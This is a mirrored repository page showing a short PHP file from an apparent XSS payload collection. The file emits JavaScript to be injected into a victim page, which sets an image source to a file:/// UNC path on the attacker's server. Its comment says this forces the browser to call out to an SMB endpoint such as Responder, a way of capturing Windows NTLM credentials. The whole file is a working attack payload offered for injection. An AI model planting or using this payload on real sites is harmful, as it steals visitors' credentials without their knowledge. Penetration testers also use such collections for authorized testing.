mirror of
https://github.com/nettitude/xss_payloads.git
synced 2024-11-25 05:30:21 +00:00
8 lines
223 B
PHP
Executable file
8 lines
223 B
PHP
Executable file
<?php
|
|
/**
|
|
* Inject this in order to have the browser call out to an SMB endpoint, e.g. Responder
|
|
*/
|
|
$url = "file:///\\".$_SERVER["SERVER_ADDR"];
|
|
echo "// $url\n";
|
|
?>
|
|
new Image().src="<?php echo $url; ?>";
|